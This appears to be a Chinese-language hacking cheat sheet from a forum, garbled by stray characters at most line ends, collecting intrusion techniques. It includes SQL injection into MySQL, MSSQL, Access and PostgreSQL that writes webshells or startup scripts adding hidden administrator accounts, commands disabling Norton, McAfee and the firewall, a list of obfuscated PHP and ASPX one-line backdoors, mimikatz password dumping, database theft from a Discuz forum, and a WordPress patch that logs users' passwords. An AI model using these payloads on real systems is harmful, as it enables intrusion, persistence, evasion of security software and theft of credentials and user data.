( Z. W5 z( ?& J2 C7 S0 W. g( d( j5 @3 \5 V: i9 M0 D) V
中文版本操作系统中针对mysql添加用户完整代码:& Q# G) A) f, G  Q

% H# [5 W: n6 [use test;
7 c. I3 {+ \, I! J" ocreate table a (cmd text);
1 Y3 F& n9 z, ~4 _/ e( ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );
( t+ b, K1 t% hinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
$ |% a' ]' ?. \6 Binsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& j" L* h2 v6 o- H# @# x' }select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
% |0 w" O4 v& x+ [drop table a;
  W' @3 U1 ]7 c- c$ t2 }+ _* A5 k) t# X# \8 }
英文版本:- R/ a# ~( O3 d" r, Z0 b( Y
- ?4 G% ?* I( \
use test;
! @5 t' W) }# jcreate table a (cmd text);
0 ], p' j  \5 W9 {/ h+ oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );9 M- N. Q: `* F  z- C/ a, x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; d: F2 h- s5 X& G. t0 w. |6 }% iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
- |1 G9 r- b; ]! w( V8 R% Y/ wselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, z+ b* y, ?) J6 T# M& \drop table a;
' b8 i+ A' H) C$ m
- z5 t2 B' V1 ?1 p& m- E6 _! Ycreate table a (cmd BLOB);
: Y5 n9 T7 v# W' Iinsert into a values (CONVERT(木马的16进制代码,CHAR));# v' N1 u9 z" J  C; Z% S/ |0 `
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe': a3 d/ l, W8 i1 F/ K& C# D
drop table a;. X9 d: Y- O8 V2 P9 N
7 z3 \  l' }1 x! @& A" M* L
记录一下怎么处理变态诺顿( F2 }( s/ W! {  b3 @& d
查看诺顿服务的路径- F+ s* J' I( \% {& l6 s
sc qc ccSetMgr
* [, L8 c' g. _, S. N$ b然后设置权限拒绝访问。做绝一点。。
2 ^* }* Q4 p& q4 e3 P! Y, xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system6 D" S7 E1 O+ n1 w% @8 j# y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"& `1 g! h3 \3 @5 }  V0 V9 ?1 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
0 B" N2 b( P6 x2 s0 G6 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone8 I. C8 K- [/ a- z0 T

3 F2 P1 C& @- n然后再重启服务器9 m! o1 n1 A6 ?1 d, g* T  h
iisreset /reboot
9 b7 ]* R1 [( g6 ?/ Q* C) m; _这样就搞定了。。不过完事后。记得恢复权限。。。。
  x' e5 R' ]; T# `& mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
1 L* F( [# Z' Q6 a* o6 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
& D; _, Y# b2 h2 s4 B$ @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
3 m  x7 K( v1 [' P6 ^% `/ Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F# B5 Q  X5 w& \% \8 L' g$ w! k4 q% _
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin) `' q- n# b( {: K

  g" O, \0 |# QEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
% K; K1 d% \' J& l* W" {. N) y- {8 g- Q7 u& s# J" h; g
postgresql注射的一些东西7 R" R+ k$ ^# q
如何获得webshell8 R" {/ i# O& e* t# I
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 8 u$ i+ X% C6 U4 r$ ^1 ?
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ' O9 X2 ]# {$ F- j' a. Z
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
5 H( _4 S" E: ?如何读文件- u0 x1 \1 ]* s% I  `& Q7 I" w" _
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
- [, v6 y: Q1 H; O5 z- X, fhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
2 [$ U$ }9 v6 n' L9 bhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
& E- o7 `) E4 Y) ~( K9 G' W
8 j3 A: H. y) f, j/ y1 rz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 i8 u! Z9 b2 D4 X  J' `0 H( U当然,这些的postgresql的数据库版本必须大于8.X7 L, x; j# l" h1 I$ n
创建一个system的函数:
3 X' W( {, a, X) Q9 j* `. G7 uCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
9 k, l' [8 s6 g/ x
, X. ?$ a9 h1 Z4 `创建一个输出表:( A9 S7 H# a  W9 p4 _
CREATE TABLE stdout(id serial, system_out text)& M, u* S( z* d5 g+ F4 b4 ~

0 j* P4 O3 s; D) I( P执行shell,输出到输出表内:
; u, }/ C0 a, t1 O% _3 gSELECT system('uname -a > /tmp/test')8 M* k# G2 W1 G9 u* h- g( R
7 O% T( w0 O/ f3 h& p, W
copy 输出的内容到表里面;
9 @% l% D! \3 ~+ e$ CCOPY stdout(system_out) FROM '/tmp/test'
/ |5 D/ z6 k" r$ m/ }, ?% X# E% t6 e1 r0 _
从输出表内读取执行后的回显,判断是否执行成功2 B+ k$ O  h" ~

4 J6 ~1 u0 ]( {" f! eSELECT system_out FROM stdout! F8 \9 J1 s1 w3 F' y9 U# h  ~
下面是测试例子
/ y% J" e7 ]% W4 @# q1 _
; S5 y" K# Z: k* f/ w/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 2 z6 Z: i( g9 T# m$ J* y6 c- ^8 S
% W/ p! @$ R; Y4 z/ _
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
9 H$ [( `, g+ z; H) `9 v4 gSTRICT --
" m5 s+ D4 q7 `7 h# j0 E9 u& y
' _# E: k: Q5 X7 I% V1 C, T" b/store.php?id=1; SELECT system('uname -a > /tmp/test') --
6 s, w; @4 \9 c. Z, K& w# O
1 G7 W3 G  ]* P6 x2 r4 P) \7 g+ h/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
$ h  N- u3 H' E  _% A9 q% j6 e6 z6 r9 L; G
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
: G0 R* Z- K' I" f& Anet stop sharedaccess    stop the default firewall" R3 n: K) z! P( S/ N1 T- `  [
netsh firewall show      show/config default firewall0 O+ K: U, a1 C7 |% s
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall/ ^" }2 \8 \- U& E/ `
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall7 x+ g2 D6 g! |9 f
修改3389端口方法(修改后不易被扫出); W! B0 z$ i' N' L& L
修改服务器端的端口设置,注册表有2个地方需要修改
& J8 W2 o4 P) k- O6 \) r8 B% X6 A) T/ U+ M& q6 m# x' q4 y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
* d) `* [7 p/ d% b1 MPortNumber值,默认是3389,修改成所希望的端口,比如6000
. S- I2 S; [7 x3 H0 l
6 N' D3 H. s& i, e" T* ]第二个地方:5 ~% |- R% @4 E' U5 S
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
  y) ^; S) r* K; |PortNumber值,默认是3389,修改成所希望的端口,比如6000( @" [4 q0 G, o
, B6 C% `. h% Y2 O- ^
现在这样就可以了。重启系统就可以了
& Y  h0 A4 \) J3 v/ X8 o/ V5 @- s
% e' F- C  p& W5 F+ r查看3389远程登录的脚本& r/ k+ I+ ]( d8 }* s4 h; p3 q* U: A
保存为一个bat文件( G, W# f) {' X' q+ _) n2 Q, x
date /t >>D:\sec\TSlog\ts.log
$ b0 T( i: ^( Y" _& X6 `time /t >>D:\sec\TSlog\ts.log5 j( Q: I# _5 N6 v; @0 H
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log9 j2 t' ~) a) u7 A2 O7 Q9 Q
start Explorer
0 S" H0 r* S1 S* }( i
: Q9 u7 c$ }# ]9 x. Q# A  umstsc的参数:
3 Z# z" {1 c; J! T# k+ H
% ]5 m; y% Z% g远程桌面连接
# \' D6 R1 H/ o: U; q  k: K9 X5 u2 h
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 O  g; L  S* E% X
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 D) z/ h% O9 i1 g
  }1 Q7 ^% o5 ^/ c' J4 h<Connection File> -- 指定连接的 .rdp 文件的名称。8 P3 K% q5 Y' F

4 F% b4 X9 X8 G+ G/v:<server[:port]> -- 指定要连接到的终端服务器。) r8 D' @; s; w2 v

8 m6 v/ o0 k& s/ h  h5 \4 q/console -- 连接到服务器的控制台会话。0 |* q- e  t* P( P( E
! P; o) h7 d' H9 g3 Q( k9 E" [
/f -- 以全屏模式启动客户端。6 @/ X- z- Y) q
7 _; J. R6 |1 z1 j
/w:<width> --  指定远程桌面屏幕的宽度。) M( W( u$ I( v% l9 f

5 W- h% C% n7 `  w/h:<height> -- 指定远程桌面屏幕的高度。" H* K8 c/ d* z* h. Q
- [: `" x3 H- e% p4 m5 y) E0 u
/edit -- 打开指定的 .rdp 文件来编辑。5 U; I! U8 |& R& Q& m1 {6 }

& |- W, i) h1 k8 P- P/migrate -- 将客户端连接管理器创建的旧版4 |& ?$ u# T: C+ \! Y
连接文件迁移到新的 .rdp 连接文件。8 y- S! E7 t* z' k

. A+ }; @$ i/ F9 v' ?/ ~9 {- i+ b: a: K* `+ P" V
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就3 o1 v" b9 W; v5 q3 t' C
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量( S- L8 u/ ^: Q2 D: n" ]
3 S: Z1 V! b9 H% s) E
命令行下开启3389
$ b8 Y9 t' L, V$ Y) }net user asp.net aspnet /add
2 w. y" g9 N$ g( j/ X# Onet localgroup Administrators asp.net /add0 w3 m9 `0 o( F% B3 [% a0 m
net localgroup "Remote Desktop Users" asp.net /add
- w+ q4 v: d* d! ^+ ?$ oattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D  l7 ^! w% u+ ~' `3 I3 [* ^5 a; z, E% F
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0/ `0 X' D5 z, S7 E( {) U0 \( r
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1( d2 v' J6 b$ B5 ]% Z
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
6 g! S5 i' e9 B4 Q* G8 Jsc config rasman start= auto
4 a! }: }4 ?/ ]sc config remoteaccess start= auto
. G. A( y" M3 Mnet start rasman
6 y3 x: V( I. L9 E' p" i- Wnet start remoteaccess. p6 x0 P: p$ l- W# A
Media
+ k$ t- W7 l: l- H1 H( N<form id="frmUpload" enctype="multipart/form-data"7 k3 q" V3 W/ O0 y' l' I
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>9 p5 ~& I! X& q
<input type="file" name="NewFile" size="50"><br>
3 G8 P5 f7 z2 x% m1 y8 @) Y<input id="btnUpload" type="submit" value="Upload">
' h; o/ ]7 G3 }0 n4 V</form># c& @; R& W) ~: h( z2 N, T

1 X) S% {0 i2 F5 c$ ycontrol userpasswords2 查看用户的密码% H6 n* h" f& P  L
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
! Y0 ~: W7 ]0 j8 m4 \, p2 I( Z. NSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
& |, I9 ]5 O+ W9 C: _2 }2 ~7 o; R, d; T. j+ X
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:4 [, `, U9 S8 U& \3 ]& h
测试1:8 E6 t. v. s7 H( M+ {
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1- {9 s4 L. B( Y* y2 ]4 _7 @

( N- u% _9 G# e& m8 [- q测试2:3 ?% G; S& W% Z
. c2 m8 K* u9 g4 w7 o% V2 @9 [6 Y
create table dirs(paths varchar(100),paths1 varchar(100), id int)/ b+ p  p, h7 }4 e
* E6 I1 W: u- p
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, }- x" l- v6 v# N# l% K$ w$ l  g3 P/ K2 b) e
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1! v$ x- y9 M# M8 C  ~# d/ ^% U/ Z
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令8 ~& ~9 O5 r) E6 U/ `5 f
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;8 y* r* E' q0 D. |9 ?. R/ [% E
net stop mcafeeframework) |$ J' n: b: i4 E+ ?: P9 \
net stop mcshield. H/ H* m# {3 a0 O# v
net stop mcafeeengineservice
+ ^4 R9 u) G2 m6 W: A7 H3 _; V. jnet stop mctaskmanager
4 @: {# G9 H" v! q% [% f( B  h6 xhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D( i8 y- S/ Y( X4 `9 j
3 b+ c& X$ D5 b5 W
  VNCDump.zip (4.76 KB, 下载次数: 1) 4 T4 U0 I+ i+ _" J" z
密码在线破解http://tools88.com/safe/vnc.php. y4 M  m8 s5 `4 H5 S! L* i/ R: X
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! E! H( e( a4 z3 v0 |0 d8 b

8 o7 J- ]; B6 O* rexec master..xp_cmdshell 'net user'! S9 v: A5 L' r6 \, F! P
mssql执行命令。# }8 W% p9 b* L1 y- k
获取mssql的密码hash查询3 g( w* e( m1 D8 r
select name,password from master.dbo.sysxlogins8 ]* w: ^( c0 N1 w

+ B% H' }% i+ g4 Zbackup log dbName with NO_LOG;9 G8 w; j9 x1 i
backup log dbName with TRUNCATE_ONLY;/ i4 H4 R" U# A' q
DBCC SHRINKDATABASE(dbName);& X  ^; {) M( M, |1 W
mssql数据库压缩
0 C5 L8 T, c0 n; f3 Z: G, q9 ?. R, I$ o+ D& @+ ?/ v" F/ J, Z
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# ~/ d5 ]! B6 w1 E: K4 U) \将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。- c' o4 q! T/ |, }$ T
* B$ k# L4 J* J( \  \( E9 ^$ k
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
. X0 b& ]* v: f: H5 [0 z备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak" r  D. C* ]( L' T9 ?- v
' V# q3 w  R9 r. z( W
Discuz!nt35渗透要点:
! s9 N3 J2 C- w9 J3 O6 _(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
% J- i2 O' Z1 o- B  M9 ^(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>) Y( `+ g: j  f. D
(3)保存。
8 O. V1 F& g5 |$ _(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ `0 G! M+ @+ u- V
d:\rar.exe a -r d:\1.rar d:\website\; F6 J* ]0 Y5 e0 d* S3 M
递归压缩website  _1 n4 J& C% l1 H( d' R
注意rar.exe的路径$ A: m- T6 C6 l& M( h, N
5 O! o+ f% q! F- W
<?php
+ R5 X& X; h+ |  L; D# ~2 S( o. j/ H# O
: I$ [( U- \3 I/ i$telok   = "0${@eval($_POST[xxoo])}";
) H0 b  U8 h# U5 [4 ?, y+ \+ T0 i' M  u+ Q& E/ A& g
$username   = "123456";
% o& J$ |$ f* g0 g
$ B1 {$ s$ m, ^$ T2 j/ ?$userpwd   = "123456";2 d5 y  a% ~- Q% @( L% J& f! }
& G# b3 ]9 i" E' H
$telhao   = "123456";
. H( I7 _$ O/ V, ^
+ h; m, U1 a! W! }, d7 D7 e$telinfo   = "123456";
& [# O* E' o) d& m$ p5 c; M, E9 R! f. D. J( J9 u5 h/ s5 F
?>
& x: |4 T  ~3 J5 ~( Yphp一句话未过滤插入一句话木马
$ X: H2 V- ]  z
4 ?) `( p3 f: w站库分离脱裤技巧0 S5 j7 m' ^5 m# z
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
' D' m( [8 A8 N1 A4 X7 lexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'7 D/ D  |1 P' \
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。; b1 w* E4 z' c' T, P
这儿利用的是马儿的专家模式(自己写代码)。5 Z! C- x7 |$ Q; k8 U
ini_set('display_errors', 1);! U5 q7 v2 ^( S; [. m
set_time_limit(0);5 B. \4 ~7 @  [+ x8 v$ H! l  I- U
error_reporting(E_ALL);
% `- a" i. E) a. P$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
3 x- b5 r3 F0 f8 a; _$ {mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
" h: L' v0 @* L8 [6 O3 Z$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* V& `# f4 d8 _- |
$i = 0;) `( Y8 D3 e' y$ |1 W
$tmp = '';
" o) G5 U/ D' w  g- Fwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {: c9 P$ x  ^4 J4 _  V0 j: n
    $i = $i+1;
8 P1 D) s  B4 X( ]$ O, y. s( i    $tmp .=  implode("::", $row)."\n";+ Z5 X8 {; [/ k/ V7 z
    if(!($i%500)){//500条写入一个文件
7 r' ?' J1 H; U5 T        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% Q. n0 u, U' T: x2 l$ S/ r        file_put_contents($filename,$tmp);( \% H6 G* e& u
        $tmp = '';
9 t5 {& M3 M/ }( j! F9 V    }* J9 S, M: J7 _2 L
}
  _8 C- m0 `7 ~0 p# J, Lmysql_free_result($result);+ o. l3 c3 n+ O& ~& @( H& q

5 H1 a2 l1 q& b$ |% |  F! U! m3 W. p$ x1 g! G. }6 S% @) ~
( [. _# M+ t( B9 p
//down完后delete# C/ W0 p3 o/ B0 Q8 r! N

2 h9 Z  n! e6 j# v3 \: t/ a
! c/ a% V3 @" ^( pini_set('display_errors', 1);, Q! t% |7 s8 t+ a- e
error_reporting(E_ALL);
* r: K! e1 l7 ~; h$i = 0;
  E! C% O7 x$ ]! _) Pwhile($i<32) {
; |# Y, \$ r$ h9 j5 K) p7 t' a8 ]6 e    $i = $i+1;  U5 W3 D/ s# k0 W
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
2 E0 E4 c% J# q9 T' v: B. M        unlink($filename);
1 T) B- T: `2 C# U1 G} $ f8 |; n5 I. v, [$ L
httprint 收集操作系统指纹4 e6 W# e0 z( H! M7 p
扫描192.168.1.100的所有端口. m* i+ T6 I; I# _! c) ^9 C
nmap –PN –sT –sV –p0-65535 192.168.1.1001 [: r' c; O- R% c$ Z$ s
host -t ns www.owasp.org 识别的名称服务器,获取dns信息, O& c+ U! y4 g& r
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
$ X2 h3 j; S& l! \" o& sNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host. k" c: [  |6 p# r: U- M, E& {+ F

8 B4 y, N& m& `) ], ~Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)8 L* [6 m9 h; e" ~5 ^. F

( f) E5 d; G; u  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)& k9 [* U( L* u) X6 q

7 q; E! H# W+ f  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
1 `( C8 S* u' {0 ?
! [" \3 }" ^" k# [; D/ p+ B. U- ?  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)  i! y$ r7 n; o/ X1 E) R

6 u6 L5 u9 d6 G" Y" |: r; g  http://net-square.com/msnpawn/index.shtml (要求安装)
2 F$ i& f$ w: @4 I7 H/ D5 O+ g, B6 |( ]3 k5 q. o: z. a6 ]0 B
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)! D5 X6 w* |& z; u' s' l
4 _7 b2 f" _) u4 L$ k. z
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
4 G4 f: [. J* T) ]/ Rset names gb23122 Q( z6 O# J. Q# k& P# O3 r; J
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。- l9 w# b: Y; A1 [% e( f
# i# I7 z# H. p. O$ W) g% i
mysql 密码修改
) U9 F' {9 M. G8 {( k* TUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
5 w$ d& e* z0 {0 i  m9 j9 y9 n; ^update user set password=PASSWORD('antian365.com') where user='root';
( G8 c. F# q4 |8 D0 z  p0 a  uflush privileges;3 e& O5 U: g# M6 F
高级的PHP一句话木马后门
8 l' o( h, ?+ k' T* o( b6 D: R; _1 I9 ]( g4 h8 E
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
5 g: Y0 W8 O: u8 M
- `1 g. C* D9 l6 n( h9 a1、4 r& t3 _, H" d7 R6 A
# I( L. e' m. T' t: K
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";( Y. o* d+ c2 H
# V# u3 K$ E' L$ }
$hh("/[discuz]/e",$_POST['h'],"Access");! j- i9 W) o  b& p8 E

' k6 G3 \' y" D- U! W# F' f0 Q! h+ j9 X1 k//菜刀一句话
$ [* O2 F. q4 k4 C/ c4 ^# y: ^% S+ b7 q
2、
3 T' S" h6 h! k, N' |7 i% d1 r, O2 }- H$ W; Q* v; V  d4 j
$filename=$_GET['xbid'];8 t+ c+ x4 }6 P% c& I; f# E# Z6 B
0 S6 ?0 C# c6 ^: y  N% l
include ($filename);
$ Y  x  N% ?7 W9 ]: {) ]) I# J
% x, h: [$ x* e; k' U//危险的include函数,直接编译任何文件为php格式运行
% R' v: ^/ p( [+ _8 F4 ^* g5 U
4 G; m: W- |9 N$ R' n2 G7 F3、% y( v2 h' p# m+ u
( J/ o& ^1 d$ @& V" G
$reg="c"."o"."p"."y";
2 i8 E& U9 _+ o3 V6 n* C; A2 H* j9 x4 q
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
( m5 ~  C) a+ B, i& n' x
5 C' a0 K' q- R0 I: S5 l, \& `//重命名任何文件, R. h: {3 p. r, H) M9 Q
4 F: C4 n. N. d6 p8 g# x& i
4、
$ @& b* c2 [0 q0 r5 q
. p/ Q% L- n9 h/ W# C$ u5 h0 N6 Z9 s$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
6 [7 v+ h6 b! x+ e" T8 ^+ y* c  v& ?7 h7 x4 ^
$gzid("/[discuz]/e",$_POST['h'],"Access");
/ y  d! [" f  w8 C' c/ B* k" Q0 Q  L! x% }- P% O
//菜刀一句话
; _6 [* u; e" G1 f# m& d/ H$ G8 Y+ A# A5 L" L. C
5、include ($uid);' _$ i( v" f3 k/ }
4 b7 T0 r" T+ x4 T* G# F! C
//危险的include函数,直接编译任何文件为php格式运行,POST
& S* r! P6 F/ J  w' B2 H' N/ E" G& J& ]' X
4 V; v, R5 d/ s% p
//gif插一句话
. s% d: L) n% ]  H% K! H5 m5 q6 j* y( A  g8 ?
6、典型一句话* y$ K- `, N2 k; f5 p

" }# i9 B( v# t1 {! b7 f# a程序后门代码
0 X$ j" h8 ]7 S<?php eval_r($_POST[sb])?>0 x1 f6 A! |. D! l% C4 f4 F
程序代码
& [: D% k8 K6 s3 R3 }<?php @eval_r($_POST[sb])?>
- \% k+ X6 s% b# t//容错代码
. y% a+ f7 R% k5 a& A5 ]4 j程序代码
7 k6 ^* |# ~2 n<?php assert($_POST[sb]);?>  ^( I9 f1 j5 H
//使用lanker一句话客户端的专家模式执行相关的php语句" ^' W! v% e8 z
程序代码
/ e3 q7 E2 u+ V<?$_POST['sa']($_POST['sb']);?>! q, g- b6 L6 p) I, \/ w- ^+ }3 y
程序代码
5 z! O/ b) O4 j! S1 }9 x<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>4 K$ P' V) q% i' a9 i; u* J
程序代码% b: P0 c- u! P# {* \) j3 b- p; g
<?php8 I$ W) l' j8 c+ ^! z' K6 u: h- t  y
@preg_replace("/[email]/e",$_POST['h'],"error");
3 S4 t7 o! \& n: o6 O?>5 g4 _5 c" B- M  _9 L! x
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
2 A  T( f% L0 d程序代码
0 r  R# ?8 U( ^<O>h=@eval_r($_POST[c]);</O>( g4 M* G- t: m# R' [
程序代码6 o2 q  j# Y3 o. S4 D# m
<script language="php">@eval_r($_POST[sb])</script>4 P, n: p1 g1 |% K
//绕过<?限制的一句话
- ?7 W7 A- a3 _7 @
* |+ g2 E7 O* Y+ j/ a% \) vhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip: G& A" {+ z9 O% Q9 \& H! J1 m' U" H
详细用法:( O" S1 X/ G& c% L: a( z2 }$ j4 V5 k
1、到tools目录。psexec \\127.0.0.1 cmd) e3 \% a# `8 I! f4 @# S  C$ ]
2、执行mimikatz
& I) B: s1 \9 l8 e- w: Q" m1 q3、执行 privilege::debug
$ a$ j! t1 U- }3 t( _4、执行 inject::process lsass.exe sekurlsa.dll
' `' @: F+ p  G  f5、执行@getLogonPasswords! M& X3 W/ R; i& ?: j
6、widget就是密码+ Q& D7 V) L3 W5 N6 k
7、exit退出,不要直接关闭否则系统会崩溃。( j/ j6 Y- z& M+ Q% d- M+ T4 a" ]+ _
6 \  f+ F7 u) A( F
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ |3 y) ]3 f  m' |. C4 W: m0 a+ d0 J9 {* r: m' A7 h* ]% L, X
自动查找系统高危补丁9 L3 c4 Q, v( m% a& B
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
/ c5 e0 W' A6 u/ V0 @3 \+ W9 b* |7 A* e/ q# ]  z
突破安全狗的一句话aspx后门
/ I* I4 A% I( b$ k, v, \<%@ Page Language="C#" ValidateRequest="false" %>% e7 m( K3 N; |  i* X! z( y
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>, [- Q6 E$ Q' {  ~' ]( U$ E0 f
webshell下记录WordPress登陆密码# v7 u5 Z4 G1 |* m( a
webshell下记录Wordpress登陆密码方便进一步社工! l4 y/ a6 j6 M* ?0 l" Q8 o! C
在文件wp-login.php中539行处添加:
& a9 X( O% c- [/ A" p* @  k" l// log password( e) F) ]" B" F$ r
$log_user=$_POST['log'];
) |6 E) x) I1 K) e$log_pwd=$_POST['pwd'];- G/ s" L; I, y$ f9 C$ B
$log_ip=$_SERVER["REMOTE_ADDR"];
: N+ {& \' h9 {, |$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
/ p+ q' G4 }# i. G9 l" k3 j$txt=$txt.”\r\n”;& c: i( Z- i/ D, h$ g& ]& F. `3 k" m
if($log_user&&$log_pwd&&$log_ip){2 k! K/ T; G) Y& T
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
* d0 K* u5 U( `  T/ I1 O- i9 k}
+ _0 u+ H2 l( y& h# c当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。# @$ o* k( t& M& h7 @
就是搜索case ‘login’$ L1 z" Y, v% k8 a
